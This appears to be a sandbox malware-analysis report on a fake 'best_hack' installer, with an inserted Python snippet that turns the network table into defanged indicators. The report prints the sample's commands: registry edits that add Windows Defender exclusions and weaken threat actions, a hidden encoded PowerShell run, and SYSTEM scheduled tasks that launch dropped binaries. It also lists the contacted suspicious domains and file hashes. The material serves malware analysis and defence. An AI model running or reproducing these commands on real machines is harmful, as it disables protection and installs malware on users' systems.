C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NxGlAgQUfzUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NxGlAgQUfzUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OdCkbftzuRPDCLooswR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OdCkbftzuRPDCLooswR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WyuevociGfNU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WyuevociGfNU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XxxUzwYQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XxxUzwYQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\unWhUoTpcLxwC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\unWhUoTpcLxwC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\FZMYpcBymcbXiuVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\FZMYpcBymcbXiuVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HsdHtTcNAoJBjrVs\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HsdHtTcNAoJBjrVs\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\FZMYpcBymcbXiuVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\FZMYpcBymcbXiuVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HsdHtTcNAoJBjrVs /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HsdHtTcNAoJBjrVs /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gnMtnfgYj" /SC once /ST 02:48:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gnMtnfgYj"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gnMtnfgYj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YESfVrKgbFKcjSeIN" /SC once /ST 15:23:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe\" qz /site_id 757674 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YESfVrKgbFKcjSeIN"

C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe

C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe qz /site_id 757674 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bGAvhKhnIPTNQeobsw"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\XxxUzwYQU\zfRebA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "iwOiVBtjWoVYUMW" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "iwOiVBtjWoVYUMW2" /F /xml "C:\Program Files (x86)\XxxUzwYQU\GnbMyEB.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "iwOiVBtjWoVYUMW"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "iwOiVBtjWoVYUMW"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "inkTbLvZLQETKy" /F /xml "C:\Program Files (x86)\WyuevociGfNU2\LzOYMrW.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "OyBqrIWqLdeiE2" /F /xml "C:\ProgramData\FZMYpcBymcbXiuVB\WUpZOtb.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "PlZzFkPIrCHUSjSZK2" /F /xml "C:\Program Files (x86)\OdCkbftzuRPDCLooswR\dsKYSUK.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qLTAOMlkEgsXQBsYXgt2" /F /xml "C:\Program Files (x86)\unWhUoTpcLxwC\CqRtzkA.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YQwpFizkoQMsJvRhq" /SC once /ST 04:38:23 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HsdHtTcNAoJBjrVs\hUqFzISs\hqhbwEs.dll\",#1 /site_id 757674" /V1 /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 880 -p 1800 -ip 1800

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YQwpFizkoQMsJvRhq"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2508

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HsdHtTcNAoJBjrVs\hUqFzISs\hqhbwEs.dll",#1 /site_id 757674

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HsdHtTcNAoJBjrVs\hUqFzISs\hqhbwEs.dll",#1 /site_id 757674

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 872 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2196

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "YQwpFizkoQMsJvRhq"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 876 -p 1800 -ip 1800

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2224

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "YESfVrKgbFKcjSeIN"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 140

Network

Country Destination Domain Proto
N/A 13.89.178.27:443 tcp
N/A 8.8.8.8:53 mainiwelminobhei.ml udp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 setupservice.xyz udp
N/A 188.114.97.0:443 setupservice.xyz tcp
N/A 104.80.225.205:443 tcp
N/A 8.249.91.254:80 tcp
N/A 8.249.91.254:80 tcp
N/A 8.249.91.254:80 tcp
N/A 93.184.221.240:80 tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 superload.info udp
N/A 91.202.5.58:80 superload.info tcp
N/A 8.8.8.8:53 static-surf.site udp
N/A 104.21.10.204:80 static-surf.site tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 my-usa.info udp
N/A 91.202.5.58:80 my-usa.info tcp
N/A 8.8.8.8:53 iplogger.com udp
N/A 148.251.234.93:443 iplogger.com tcp
N/A 95.163.241.63:80 95.163.241.63 tcp
N/A 8.8.8.8:53 ilonamaska.info udp
N/A 91.202.5.58:80 ilonamaska.info tcp
N/A 85.208.136.33:80 85.208.136.33 tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 n63b16.info udp
N/A 46.23.109.153:81 n63b16.info tcp
N/A 8.8.8.8:53 downwingbuttons.site udp
N/A 185.117.88.231:80 downwingbuttons.site tcp
N/A 85.208.136.148:80 85.208.136.148 tcp
N/A 8.8.8.8:53 staticcontentfiles.info udp
N/A 185.117.88.231:57120 staticcontentfiles.info tcp
N/A 8.8.8.8:53 ip-api.com udp
N/A 208.95.112.1:80 ip-api.com tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 185.117.88.231:57120 staticcontentfiles.info tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 224.0.0.251:5353 udp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 z0dfnakw4qndvgzp3frm4oa5unhcka.lqbriyvuu2wylnkx4 udp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 mainiwelminobhei.ml udp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 88.119.175.57:80 tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 service-domain.xyz udp
N/A 3.80.150.121:443 service-domain.xyz tcp
N/A 8.8.8.8:53 mainiwelminobhei.ml udp
N/A 172.67.187.207:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 api5.check-data.xyz udp
N/A 54.191.228.37:80 api5.check-data.xyz tcp
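The table above mixes three kinds of rows: DNS lookups to 8.8.8.8:53 (with the queried name in the Domain column), connections to a resolved name, and connections to a literal address with no hostname at all (95.163.241.63, 85.208.136.33, 85.208.136.148). The same name can also front more than one address in one run (mainiwelminobhei.ml resolves to 104.21.72.223 and later 172.67.187.207), and two destinations use non-standard ports (46.23.109.153:81 and 185.117.88.231:57120). The block below is an added example, not part of the sandbox report: it parses rows in this layout into a deduplicated IOC set and separates those cases. The rows are a subset copied from the table above; the resolver address, the mDNS noise list and the "expected ports" set are this example's assumptions about the sandbox.

```python
"""Turn a sandbox network table into a deduplicated, defanged IOC set.

Added example, not part of the sandbox report. The rows below are copied from
the table above (a subset); the resolver address, the noise list and the
expected-port set are this example's assumptions about the sandbox.
"""
import ipaddress

# Constructed input: rows in the table's own "Country Destination Domain Proto" layout.
SAMPLE_ROWS = """\
N/A 13.89.178.27:443 tcp
N/A 8.8.8.8:53 mainiwelminobhei.ml udp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 setupservice.xyz udp
N/A 188.114.97.0:443 setupservice.xyz tcp
N/A 95.163.241.63:80 95.163.241.63 tcp
N/A 8.8.8.8:53 n63b16.info udp
N/A 46.23.109.153:81 n63b16.info tcp
N/A 8.8.8.8:53 staticcontentfiles.info udp
N/A 185.117.88.231:57120 staticcontentfiles.info tcp
N/A 8.8.8.8:53 ip-api.com udp
N/A 208.95.112.1:80 ip-api.com tcp
N/A 224.0.0.251:5353 udp
N/A 8.8.8.8:53 mainiwelminobhei.ml udp
N/A 172.67.187.207:80 mainiwelminobhei.ml tcp
"""

RESOLVER = "8.8.8.8"          # assumption: the sandbox's DNS resolver
NOISE_IPS = {"224.0.0.251"}   # mDNS multicast; Windows background noise, not an indicator
EXPECTED_PORTS = {53, 80, 443}


def _is_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def parse_row(line):
    """Split one table row; the Domain column is optional in this layout."""
    parts = line.split()
    if len(parts) not in (3, 4) or ":" not in parts[1]:
        return None  # header line or something that is not a destination
    ip, port = parts[1].rsplit(":", 1)
    return {"ip": ip, "port": int(port), "proto": parts[-1],
            "domain": parts[2] if len(parts) == 4 else None}


def extract_iocs(text):
    domains = {}       # domain -> set of addresses actually connected to
    endpoints = set()  # (ip, port, proto) tuples with real traffic
    direct_ip = set()  # HTTP to a literal address, no hostname at all
    for line in text.splitlines():
        row = parse_row(line)
        if row is None or row["ip"] in NOISE_IPS:
            continue
        if row["ip"] == RESOLVER and row["port"] == 53:
            domains.setdefault(row["domain"], set())  # lookup seen, traffic maybe not
            continue
        endpoints.add((row["ip"], row["port"], row["proto"]))
        if row["domain"] is None:
            continue
        if _is_ip(row["domain"]):
            direct_ip.add(row["domain"])
        else:
            domains.setdefault(row["domain"], set()).add(row["ip"])
    return {"domains": domains, "endpoints": endpoints, "direct_ip": direct_ip}


def unusual_ports(iocs, expected=frozenset(EXPECTED_PORTS)):
    """Ports outside the usual web/DNS set deserve their own firewall rule."""
    return {port for _, port, _ in iocs["endpoints"] if port not in expected}


def multi_homed(iocs):
    """Names that fronted more than one address in the run: block the name,
    not the address, because the address is shared or rotating."""
    return {d for d, ips in iocs["domains"].items() if len(ips) > 1}


def defang(indicator):
    """Make a domain or address safe to paste into a ticket."""
    return indicator.replace(".", "[.]")
```

Two caveats when turning this into blocks: ip-api.com is a public geolocation API and iplogger.com a public IP-logging service, so both are useful as behavioural indicators (stealers commonly call them) but poor as network blocks on their own; and the literal-IP HTTP destinations are the ones that never show up in a DNS-based control, so they belong in the firewall list rather than the sinkhole list.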

Files

memory/4864-132-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4864-134-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp

MD5 f37fc9007d7cac6c71bfc69921887808
SHA1 ca60cb48048e3bd66919205fadf3be9b54b0ddfd
SHA256 f124fd180f1d91fb12f9d5df6f83faa3bba46bca37e6a5f8fb27022338231c53
SHA512 3c79e686cfbb8b7ce2a02b2b6a28403e63707164b1912ef550e629a29f26b2054f26f495ad6554a154cdf7e43dbf537fdd9b4bd0ad90916830438b5a6c567cd9

memory/1656-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp

MD5 f37fc9007d7cac6c71bfc69921887808
SHA1 ca60cb48048e3bd66919205fadf3be9b54b0ddfd
SHA256 f124fd180f1d91fb12f9d5df6f83faa3bba46bca37e6a5f8fb27022338231c53
SHA512 3c79e686cfbb8b7ce2a02b2b6a28403e63707164b1912ef550e629a29f26b2054f26f495ad6554a154cdf7e43dbf537fdd9b4bd0ad90916830438b5a6c567cd9

C:\Users\Admin\AppData\Local\Temp\is-QN7NH.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/1616-139-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

MD5 b8aa5a417e4954313a8001e72e66e51c
SHA1 672ee46f694277cc72dd5671baa1d22a6e3482b7
SHA256 ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308
SHA512 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2

memory/1616-141-0x0000000000400000-0x000000000158E000-memory.dmp

memory/1616-142-0x0000000000400000-0x000000000158E000-memory.dmp

memory/1616-143-0x0000000000400000-0x000000000158E000-memory.dmp

memory/1616-144-0x0000000000400000-0x000000000158E000-memory.dmp

memory/1668-145-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

MD5 b8aa5a417e4954313a8001e72e66e51c
SHA1 672ee46f694277cc72dd5671baa1d22a6e3482b7
SHA256 ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308
SHA512 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2

memory/1800-146-0x0000000000000000-mapping.dmp

memory/1800-149-0x0000000000400000-0x000000000158E000-memory.dmp

memory/4864-150-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1800-151-0x0000000000400000-0x000000000158E000-memory.dmp

memory/1800-152-0x0000000000400000-0x000000000158E000-memory.dmp

memory/4056-153-0x0000000000000000-mapping.dmp

C:\Users\Admin\Documents\best_hack.zip_id23904541.exe

MD5 520b5aedc6da20023cfae3ff6b6998c3
SHA1 6c40cb2643acc1155937e48a5bdfc41d7309d629
SHA256 21899e226502fe63b066c51d76869c4ec5dbd03570551cea657d1dd5c97e7070
SHA512 714dedbb46f16ec64eb0883462635cfa8cbb870b8bc05a419ebe272f82997f71e9bdb1adcdedd62fda7a1032cffca2b8ec93d2fdf4b5f3fa8dedbe7274372c6d

memory/4056-155-0x0000000000A80000-0x0000000000F15000-memory.dmp

memory/4056-156-0x0000000000070000-0x0000000000073000-memory.dmp

C:\Users\Admin\Documents\best_hack.zip_id23904541.exe

MD5 520b5aedc6da20023cfae3ff6b6998c3
SHA1 6c40cb2643acc1155937e48a5bdfc41d7309d629
